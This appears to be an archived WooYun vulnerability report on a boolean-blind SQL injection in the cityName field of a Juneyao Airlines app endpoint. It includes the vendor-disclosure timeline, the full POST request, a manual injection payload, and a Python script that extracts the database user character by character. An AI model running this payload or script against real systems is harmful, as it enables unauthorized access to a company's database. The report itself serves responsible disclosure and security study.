乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-01: 细节已通知厂商并且等待厂商处理中 2015-11-01: 厂商已经确认,细节仅向厂商公开 2015-11-11: 细节向核心白帽子及相关领域专家公开 2015-11-21: 细节向普通白帽子公开 2015-12-01: 细节向实习白帽子公开 2015-12-16: 细节向公众公开
吉祥航空官网存在SQL注入漏洞(附验证码脚本)
目标:吉祥航空APP检测发现以下地方存在SQL注入:(POST中的cityName,布尔盲注)
POST /ws/service/tcityAirportInfoService/getAirTransports HTTP/1.1Content-Type: application/jsonContent-Length: 102X-Requested-With: XMLHttpRequestReferer: http://weixin.juneyaoair.com/ws/service/tcityAirportInfoService/getAirTransportsCookie: deviceId=A0000038518D0CHost: weixin.juneyaoair.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*{"AirTransportQueryReq":{"cityName":"厦门","hotCity":"Y"}}
SQLMap能检测出来,但没出数据,估计是过滤了,手工弄了下,payload如下:
' and 1=1 and '%'='
于是自己写了个Python:(以user()为例,测试时请自行修改程序中代理)
#!/usr/bin/env python#coding=utf8import httplib, urllib, reuser = ''httpClient = Nonefor num in range(1,9): for ascii_num in range(33,127): try: params = '{"AirTransportQueryReq":{"cityName":"厦门%\' and ASCII(SUBSTRC(user(),'+ str(num) +',1))='+ str(ascii_num) +' and \'%\'=\'","hotCity":"Y"}}' httpClient = httplib.HTTPConnection("192.168.222.202", 8080, timeout=30) headers = {"Host": "weixin.juneyaoair.com", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0", "Accept-Encoding": "gzip,deflate", "Accept": "*/*", "Cookie": "deviceId=A0000038000000", "Connection": "keep-alive", "Content-Type": "application/json", "Content-Length": len(params)} httpClient.request("POST", "http://weixin.juneyaoair.com/ws/service/tcityAirportInfoService/getAirTransports", params, headers) response = httpClient.getresponse() rp = response.read() #print phonecode #response_headers = str(response.getheaders()) if len(rp) > 1000: user = user + chr(ascii_num) print "User(): " + user break except Exception, e: print e finally: if httpClient: httpClient.close()
1、SQLMap漏洞证明
2、当前数据库用户
危害等级:中
漏洞Rank:8
确认时间:2015-11-01 20:01
漏洞确认
暂无
